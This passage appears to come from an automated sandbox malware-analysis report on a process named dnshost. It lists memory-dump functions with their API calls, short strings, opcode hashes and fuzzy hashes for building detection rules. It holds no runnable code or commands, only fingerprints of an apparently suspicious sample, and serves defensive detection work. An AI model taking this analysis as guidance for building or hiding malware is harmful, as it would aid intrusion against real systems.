Function 00F22590 Relevance: 1.6, APIs: 1, Instructions: 50windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 00F225F5

Memory Dump Source

Source File: 00000013.00000002.2154581693.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_f20000_dnshost.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: a8411262eadd8b343b142672d50f9d22c959e2959f7463243935abcbc22d1c36
Instruction ID: 8a72ed0a4db1253fa4d1d59df05e81be8f3abdeba6ee5289f670229ff7b0f50b
Opcode Fuzzy Hash: a8411262eadd8b343b142672d50f9d22c959e2959f7463243935abcbc22d1c36
Instruction Fuzzy Hash: 071116B58002599FCB10CF99D945BDEBFF8FB48320F14841AE954A3201C374A944DFA1

Function 06BEDC50 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 06BEDCB2

Memory Dump Source

Source File: 00000013.00000002.2164494275.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6be0000_dnshost.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 7125f905a150738bd68318d696d428c77fde672bdc216cbbb427ed6e71f087e7
Instruction ID: d9d843fc5831b2f4fc8eb8f48e9f07897a909b8d9b5740a1024a7fa35d5bcccf
Opcode Fuzzy Hash: 7125f905a150738bd68318d696d428c77fde672bdc216cbbb427ed6e71f087e7
Instruction Fuzzy Hash: 4F113AB1D002498FDB20DFAAC84579EFBF4EF88324F148419D519A7340CB75A944CBA4

Function 00E9B498 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 00E9B4FE

Memory Dump Source

Source File: 00000013.00000002.2154469466.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_e90000_dnshost.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: c9fcde07b1893f3421c9fb22b2d96bc985cb40426b0ac427075a767903bee328
Instruction ID: b763337368f3c119103ff0afcbd3fff4bd0ae8450659172414750df246e3b8cb
Opcode Fuzzy Hash: c9fcde07b1893f3421c9fb22b2d96bc985cb40426b0ac427075a767903bee328
Instruction Fuzzy Hash: 6211E3B6C002498FDB10CF9AD944ADEFBF5EB88714F15841AD429B7210D375A545CFA1

Function 00F22598 Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 00F225F5

Memory Dump Source

Source File: 00000013.00000002.2154581693.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_f20000_dnshost.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: ed69ef2a4decbd83cf78bc3f341189e37aa9501d164e479ed797145f10caf6a7
Instruction ID: 96d42d18101cf2cab72d210799ef40f073944b7b69e5760ea02fbe10a668d726
Opcode Fuzzy Hash: ed69ef2a4decbd83cf78bc3f341189e37aa9501d164e479ed797145f10caf6a7
Instruction Fuzzy Hash: D111D3B58003499FDB10DF9AD985BDEBBF8EB48324F148419E518A7200C375A944DFA5

Function 06BFE7D0 Relevance: 1.4, Strings: 1, Instructions: 140COMMON

Download Yara Rule

Strings

PHeq, xrefs: 06BFE981

Memory Dump Source

Source File: 00000013.00000002.2164572782.0000000006BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6bf0000_dnshost.jbxd

Similarity

API ID:
String ID: PHeq
API String ID: 0-2873676430
Opcode ID: 9421e84df7a3229aac452ed19688f24976f08d1bd6640e1a61b7f7b768281944
Instruction ID: 318a974557f579abb9e41f7f2a8ebfa000f8474e49c84f613d6511d749150448
Opcode Fuzzy Hash: 9421e84df7a3229aac452ed19688f24976f08d1bd6640e1a61b7f7b768281944
Instruction Fuzzy Hash: C1515970B205059FDB98DF25C988BAAB7B1EF88704F1495A9E506DB271CB30EC4ACB50

Function 06BFD570 Relevance: 1.4, Strings: 1, Instructions: 128COMMON

Download Yara Rule

Strings

PHeq, xrefs: 06BFD6EE

Memory Dump Source

Source File: 00000013.00000002.2164572782.0000000006BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6bf0000_dnshost.jbxd

Similarity

API ID:
String ID: PHeq
API String ID: 0-2873676430
Opcode ID: 0563eb068b01d4cf509193df771322c713b79a1995952e0a14063d809668f231
Instruction ID: ea301f796cbde90bf19f1b2de6de6f5e15b999d9239f8cf1684f4fcaf97c8524
Opcode Fuzzy Hash: 0563eb068b01d4cf509193df771322c713b79a1995952e0a14063d809668f231
Instruction Fuzzy Hash: 5C511274A10204CFCB54DF68C588AA9BBF1FF48315B2595A8E50AEB3B1DB31EC45CB50

Function 06BFE9AC Relevance: 1.4, Strings: 1, Instructions: 101COMMON

Download Yara Rule

Strings

(iq, xrefs: 06BFE9AD

Memory Dump Source

Source File: 00000013.00000002.2164572782.0000000006BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6bf0000_dnshost.jbxd

Similarity

API ID:
String ID: (iq
API String ID: 0-3943945277
Opcode ID: ea054e1d8e4994de02a7dab82fbd0e5c14c22683551fecaa2053f19a906f0b35
Instruction ID: 2dc9b5d47143e8add592214c779fdc57f209cf42ff6f4c593d7bc3e8afd74ded
Opcode Fuzzy Hash: ea054e1d8e4994de02a7dab82fbd0e5c14c22683551fecaa2053f19a906f0b35
Instruction Fuzzy Hash: 384181707106009FC7A59B28C888B6977E6FF81310F1595A9E15ACB2B2DF74E88BCB40

Function 06BCD608 Relevance: 1.3, APIs: 1, Instructions: 69COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,06BCDDB9,?,?), ref: 06BCDF60

Memory Dump Source

Source File: 00000013.00000002.2164332520.0000000006BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6bc0000_dnshost.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: de9941dff0ef541d0314010c56cc76cd4b0a736d1f90f6e9898575a2ec43ba0f
Instruction ID: 7b984c358573b39c0816082795d1a5c372a7b7c20b957b135fe428737f5aa0b3
Opcode Fuzzy Hash: de9941dff0ef541d0314010c56cc76cd4b0a736d1f90f6e9898575a2ec43ba0f
Instruction Fuzzy Hash: 7821E0B18087898FDB11DFA8C4946DEBFF4EF89320F14849EC994A7352D334A544CBA5

Function 06BCD644 Relevance: 1.3, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,06BCDDB9,?,?), ref: 06BCDF60

Memory Dump Source

Source File: 00000013.00000002.2164332520.0000000006BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6bc0000_dnshost.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 2d31c514f5572a1282bcf574f9086c596c4a87d3d7313d4297213abd213288b2
Instruction ID: 6255be5fd610a3fc94ab38d3575b60361364d6806a16b4a4cc8d14024768c3a0
Opcode Fuzzy Hash: 2d31c514f5572a1282bcf574f9086c596c4a87d3d7313d4297213abd213288b2
Instruction Fuzzy Hash: 401125B6804249CFDB60DF99C445BDEBBF4EF48320F10846AE958A7240D778AA44CFA5

Function 06BCDF00 Relevance: 1.3, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,06BCDDB9,?,?), ref: 06BCDF60

Memory Dump Source

Source File: 00000013.00000002.2164332520.0000000006BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6bc0000_dnshost.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 79e2c28ddb4763c553e276c00411a92a24b12afd7473e23182543f0afc3c337f
Instruction ID: acef1ddce011429ba93d07e6989cf9c49d10dad54c7a80a38711d980ecff97b6
Opcode Fuzzy Hash: 79e2c28ddb4763c553e276c00411a92a24b12afd7473e23182543f0afc3c337f
Instruction Fuzzy Hash: A21128B58002498FCB20DF99C985BDEBBF4EB48320F108469E959A7240D738A544CFA5

Function 06BF54C0 Relevance: 1.3, Strings: 1, Instructions: 40COMMON

Download Yara Rule

Strings

4'eq, xrefs: 06BF5519

Memory Dump Source

Source File: 00000013.00000002.2164572782.0000000006BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6bf0000_dnshost.jbxd

Similarity

API ID:
String ID: 4'eq
API String ID: 0-1552367303
Opcode ID: a3d8da075decd383c6f6751960041b1f3526d72228bacb147e3729c1a9b7bd96
Instruction ID: 9d80061dedf384deb2e57ff67ea61c7819543653f832525aac187c83ee12d2a1
Opcode Fuzzy Hash: a3d8da075decd383c6f6751960041b1f3526d72228bacb147e3729c1a9b7bd96
Instruction Fuzzy Hash: 1C112271919286DFC706EB78D46964D7FB1FF42220B0842EDD8059F293DE346902CB62

Function 06BF54E8 Relevance: 1.3, Strings: 1, Instructions: 32COMMON

Download Yara Rule

Strings

4'eq, xrefs: 06BF5519

Memory Dump Source

Source File: 00000013.00000002.2164572782.0000000006BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6bf0000_dnshost.jbxd

Similarity

API ID:
String ID: 4'eq
API String ID: 0-1552367303
Opcode ID: 6a019f970a13c36ff21ae18011f54b71c3d05944c42543f9e10c777849503cbd
Instruction ID: ae80df00e79e38f4284ee6096e8e16125fc0d60b82a075876f50649494eeee47
Opcode Fuzzy Hash: 6a019f970a13c36ff21ae18011f54b71c3d05944c42543f9e10c777849503cbd
Instruction Fuzzy Hash: D6F0DC30A11208EFCB04FFB8E58954C7FF1FF84200B5041A8E805EB245EE306A05CF60

Function 06BFB62B Relevance: .4, Instructions: 410COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2164572782.0000000006BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6bf0000_dnshost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 82fc1f1e0ef22ff397f77831dbe0dac9d41f11a22bc3d5ea37897b8e2699db33
Instruction ID: 69e2206f86ddd5429e705a53ff4bfd91565e46a87fa0a1b1eae2f1cffcf0c3bf
Opcode Fuzzy Hash: 82fc1f1e0ef22ff397f77831dbe0dac9d41f11a22bc3d5ea37897b8e2699db33
Instruction Fuzzy Hash: E90216B4A101049FCB48DF68D498AAD7BF2FF88314F5595A8E5099B372DB30EC89CB50

Function 06BF3528 Relevance: .2, Instructions: 167COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2164572782.0000000006BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6bf0000_dnshost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 31f0210224bcee5aa5d1d01183c138e92e0cdf6e7568aec5bd108c6c986ced59
Instruction ID: bac468136aed6aaeb0845c26f520ff99e190a980e9767dbb630f17c81dee43c8
Opcode Fuzzy Hash: 31f0210224bcee5aa5d1d01183c138e92e0cdf6e7568aec5bd108c6c986ced59
Instruction Fuzzy Hash: 53519EB0B20204DFDB54EB68C484B6AB7E6EF88300F1441A9E609DB3B1CB75EC45CB91

Function 06BF3518 Relevance: .1, Instructions: 131COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2164572782.0000000006BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6bf0000_dnshost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ec29a8937bfee5fa3fe7059f4e6238d2b2925de6d668005075e4072244369e99
Instruction ID: baa31d5f8c2a06e974dcea554ab12d355a0c48ff99d0a3d057498ae54350dd9d
Opcode Fuzzy Hash: ec29a8937bfee5fa3fe7059f4e6238d2b2925de6d668005075e4072244369e99
Instruction Fuzzy Hash: 0A419FB0B10204DFDB55EF68C484AAEB7F6EF88300F1455A9E609AB361CB75EC45CB91

Function 06BF5DE8 Relevance: .1, Instructions: 119COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2164572782.0000000006BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6bf0000_dnshost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c43d76658756e065062519b99f4851902167e0ffdbc16de94c0cf8477061fe72
Instruction ID: 8cfd056ba017db8535022fddd1c2e47542a68c11e8a27c3299d95b61c021ad5d
Opcode Fuzzy Hash: c43d76658756e065062519b99f4851902167e0ffdbc16de94c0cf8477061fe72
Instruction Fuzzy Hash: 224137B2B206008FC775DB28C844BBAB7D6EFC5300F0494AEE519CB661CB35E849CB91

Function 06BFC130 Relevance: .1, Instructions: 118COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2164572782.0000000006BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6bf0000_dnshost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c6a99b0ef391958cb5ca3405437533625f909cec903d59e8bef2b212ea4f19be
Instruction ID: 9aa4e2544748d4cec8ffe8342d7ad39b58ca5a51fb33169e8cfc89d77546e15c
Opcode Fuzzy Hash: c6a99b0ef391958cb5ca3405437533625f909cec903d59e8bef2b212ea4f19be
Instruction Fuzzy Hash: 4041C6B0710604CFD7A5AB74C884B7AB7B2FF85300F1095A9D2558B2B1CF71AD8ACB91

Function 06BFC140 Relevance: .1, Instructions: 117COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2164572782.0000000006BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6bf0000_dnshost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 31d2764ba88231e849c7fb1a6a988e952437cc5f5f00e9f6e665eb5031d900bd
Instruction ID: af0be62a60420f05d97be0487ad08f7c05db0f07f89bbe82bd2859fcaa427a3b
Opcode Fuzzy Hash: 31d2764ba88231e849c7fb1a6a988e952437cc5f5f00e9f6e665eb5031d900bd
Instruction Fuzzy Hash: 474185B07106049FD7A5AB74C884B7AB7B2FF85310F1095A9D2158B3B1CF71AD4ACB91

Function 06BF8A70 Relevance: .1, Instructions: 107COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2164572782.0000000006BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6bf0000_dnshost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: de16471a3bceeec1e8bb17a80c6894456abfd8a43799a45c78c342fa88323a7e
Instruction ID: 17a9c13de6ab80b357138ba241e3e05916f9038fb8c3a982ad707266c47c5f5d
Opcode Fuzzy Hash: de16471a3bceeec1e8bb17a80c6894456abfd8a43799a45c78c342fa88323a7e
Instruction Fuzzy Hash: F53159B17006108FC755AF39D45862EBBF2EFC9211B144668E50ACB3A5EF35ED0ACB81

Function 06BF8A80 Relevance: .1, Instructions: 102COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2164572782.0000000006BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6bf0000_dnshost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be21abf06e946ac7d43e7fe23bcac99536f726141fb1a547888011f9ab29f858
Instruction ID: 2f5710e63bddc4ab03de6e217754d3c7d2f0d7aa90773b805612a5b575eb80e8
Opcode Fuzzy Hash: be21abf06e946ac7d43e7fe23bcac99536f726141fb1a547888011f9ab29f858
Instruction Fuzzy Hash: 04314BB07006108FC755AB39D45862EBBF6EFC9211B14466DE50ACB3A5DF34ED0ACB81

Function 06BFCCE0 Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2164572782.0000000006BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6bf0000_dnshost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d3f487e2c1a1c780d5a6e2eefd78a6fc75e01194847a91a052efbd062620270e
Instruction ID: f9c4223229469fec789c99a08490db1eb382167eee06f9a42545f8ee169a9a7f
Opcode Fuzzy Hash: d3f487e2c1a1c780d5a6e2eefd78a6fc75e01194847a91a052efbd062620270e
Instruction Fuzzy Hash: 60313A747606008FDBA4DB29C884B6A77E6FF84714F0594A9E61ACB371DE30E849CB50

Function 06BFFD38 Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2164572782.0000000006BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6bf0000_dnshost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf18b14bcff15de58634f0201fb40673541b7fa4aee082454a0c1d771c8c06ed
Instruction ID: d4ff1d85fca15ccaa0c47296b15bff8285759dd0246066f8260266711b5b9ea5
Opcode Fuzzy Hash: bf18b14bcff15de58634f0201fb40673541b7fa4aee082454a0c1d771c8c06ed
Instruction Fuzzy Hash: BE3138B5B102149FCB559F68C884A6DBBB6FF88320F1146A9E6259B3B1CB71DC05CB90

Function 06BFFD48 Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2164572782.0000000006BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6bf0000_dnshost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e30be90e5cf38adfe6eea5f4a790d7c240be84db4cfe04e402d8301451a9236c
Instruction ID: 2b0ea19a9e08869b3c47144cfa0791c9cc167123cc52eec2d1d52f529c276bf2
Opcode Fuzzy Hash: e30be90e5cf38adfe6eea5f4a790d7c240be84db4cfe04e402d8301451a9236c
Instruction Fuzzy Hash: 9F311875B102149FCB549F68C884A6E7BBAFF88620B1042A9E6259B3B1CB71DD05CB90

Function 06BF6589 Relevance: .1, Instructions: 94COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2164572782.0000000006BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6bf0000_dnshost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 54d5b73d3530eb83773c7fca3f3ef3f2451877fb17c117e4941e3c2d5d183cc7
Instruction ID: 6738f47a3c129ca86b1296a39549ef6e16b6f6a6cd51167082bfaf86ce1f64a0
Opcode Fuzzy Hash: 54d5b73d3530eb83773c7fca3f3ef3f2451877fb17c117e4941e3c2d5d183cc7
Instruction Fuzzy Hash: 77313875A006048FC745DF68C49498ABBF2FF8C720F1584A9E515AB362DB31EC8ACB60

Function 06BFD2C0 Relevance: .1, Instructions: 93COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2164572782.0000000006BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6bf0000_dnshost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67a3962f650ea4e5b8de95a2103d381a5301fa96314087a0a29edd74033208f4
Instruction ID: 85bb06328e50a606f4b212163767c032bcf0b35099e5004ad6946c6a70b9c666
Opcode Fuzzy Hash: 67a3962f650ea4e5b8de95a2103d381a5301fa96314087a0a29edd74033208f4
Instruction Fuzzy Hash: B6311A757206008FCB64DF29C484B5AB7F6FF88714F1594A9E61ACB371DA31E849CB50

Function 06BF7ED8 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2164572782.0000000006BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6bf0000_dnshost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c1e06ffb07e7cca5b3e3c0099176461ef1ca2b923320eef760d554fd40e8f013
Instruction ID: 4ecfe1dec5500e44c0555a7589134d3b89cf71a5340ecc24465ff723a8a8f210
Opcode Fuzzy Hash: c1e06ffb07e7cca5b3e3c0099176461ef1ca2b923320eef760d554fd40e8f013
Instruction Fuzzy Hash: 5531A070710A45CFCB959B2AE85892EBBF6EFC861134441A9E90AC77B4DF34DC05CB91

Function 06BF3864 Relevance: .1, Instructions: 88COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2164572782.0000000006BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6bf0000_dnshost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 99666aafa03c042c49e9f1ed968ebd4a543b2f6991e11a11a4cdced3edca31f7
Instruction ID: 00fbb069c196ed0ac5f6727c6a453186e3201b8c798ad4a78fba7d68f44e4a83
Opcode Fuzzy Hash: 99666aafa03c042c49e9f1ed968ebd4a543b2f6991e11a11a4cdced3edca31f7
Instruction Fuzzy Hash: FE312B78A21219DFCB44DF69D894EADF7F5FF88700B0155A9EA15AB371C730A808CB90

Function 06BF4528 Relevance: .1, Instructions: 86COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2164572782.0000000006BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6bf0000_dnshost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80ab1bee04b842c7627a09ae930078bdd607636464a31b312f0b571318d90265
Instruction ID: a7faa7a9c9cb561e17e64183e71941a3ecf34df139509fc9233fe6978c0bcaf3
Opcode Fuzzy Hash: 80ab1bee04b842c7627a09ae930078bdd607636464a31b312f0b571318d90265
Instruction Fuzzy Hash: C921AE75B202108FCB44EB6DD41496E73EAEF8462071540EAE709CB372EE31DC49CB90

Function 06BF7EC8 Relevance: .1, Instructions: 86COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2164572782.0000000006BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6bf0000_dnshost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 403aad87aac383a6871477c0983f10cb98bb0f9235c06dd9fc0717c0514cc6c1
Instruction ID: 8d8fbec2529513dea20860aca1aa69f5bf681590531a2935c19d2b40b2a09166
Opcode Fuzzy Hash: 403aad87aac383a6871477c0983f10cb98bb0f9235c06dd9fc0717c0514cc6c1
Instruction Fuzzy Hash: EA316FB0710641CFCB959B2AE85892DBBE6EFC861230551E9E90AC77B4DF34DC05CB92

Function 06BFCFC0 Relevance: .1, Instructions: 84COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2164572782.0000000006BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6bf0000_dnshost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 61ce74eb28022a3a55fd0af4a037fa6b626a72118a116ba10537277ee48b0f4a
Instruction ID: a2728b8d4c3a25b5dc5896cfeea15f904086c0e7654866647490c0a7314ad375
Opcode Fuzzy Hash: 61ce74eb28022a3a55fd0af4a037fa6b626a72118a116ba10537277ee48b0f4a
Instruction Fuzzy Hash: C93144706207009FD7A4DB28C889B6577E5FF40724F51D9A9E65A8B2B1DF70E88BCB40

Function 06BFDBB8 Relevance: .1, Instructions: 84COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2164572782.0000000006BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6bf0000_dnshost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 06c18ed4c3520aee604bcba8d4742e7d080b130e218eae91745c8fa41b5c31ff
Instruction ID: b638442967f315a48d3df87a766511911726eb7310abec71d2f6926f476b9434
Opcode Fuzzy Hash: 06c18ed4c3520aee604bcba8d4742e7d080b130e218eae91745c8fa41b5c31ff
Instruction Fuzzy Hash: 90219FB5B201044F9FD96739881463F3AD7DFC464171911AAC616CB3A9EFB8CC4AC792

Function 06BFD875 Relevance: .1, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2164572782.0000000006BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6bf0000_dnshost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f26214b03e17082e260e1a7b110d527300f0fc2e65e8bc38019f80cb9c37f83
Instruction ID: d1e37fad7f5501ffbd67464b49b522c034dfd5f0c36e03147765350b85a31caa
Opcode Fuzzy Hash: 2f26214b03e17082e260e1a7b110d527300f0fc2e65e8bc38019f80cb9c37f83
Instruction Fuzzy Hash: 0C3110B1A20208CFCB95DF64C954AED77F2EF88311F5450A9D905AB2A1DB31ED45CF60

Function 00E3D4C4 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2154208500.0000000000E3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E3D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_e3d000_dnshost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c70cf9ec779e385e020e35919134e10bbc12982333375be6b45cc9297c848903
Instruction ID: 8d5552449f6ae070f0244ef9894e8860b35db9ecb1ff02c11235b4695856aed1
Opcode Fuzzy Hash: c70cf9ec779e385e020e35919134e10bbc12982333375be6b45cc9297c848903
Instruction Fuzzy Hash: 04213772508240EFCB05DF14EDC8B26BF65FB98328F24C569E8092B256C336D816CBA1

Function 00E3D3D8 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2154208500.0000000000E3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E3D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_e3d000_dnshost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9071dbf9a43ffc2c501dbaf9114a5db26dc9776568342d97180b30f3e5292002
Instruction ID: 6db7b45c83639aa14fbb517906c332f636adcfb1604424b6dfd420cfcc36df11
Opcode Fuzzy Hash: 9071dbf9a43ffc2c501dbaf9114a5db26dc9776568342d97180b30f3e5292002
Instruction Fuzzy Hash: 5B217C71108204DFCB01DF14EDC8B26BF65FB98324F20C56CD8095B246C336E816C7A1

Function 06BFCD24 Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2164572782.0000000006BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6bf0000_dnshost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bbd00112ce947d53f0ac48724d356fb5f1aa5ba976d240464e819d6f0694b86f
Instruction ID: 3f4d4f1164cb7712463ead3d6d5e65f9a068a940ab789ecb5f6f72ba646e21d8
Opcode Fuzzy Hash: bbd00112ce947d53f0ac48724d356fb5f1aa5ba976d240464e819d6f0694b86f
Instruction Fuzzy Hash: 1F312A71210600CFC795DB28C898BA677E6FF84315F5589A9E25ACB361CF71A88ACB40

Function 00E4D1D4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2154274574.0000000000E4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E4D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_e4d000_dnshost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9394d0c7416563ba3aaa5594a30b90ceb8f1a3d4c20a357dcc32d5ee0a6b37fd
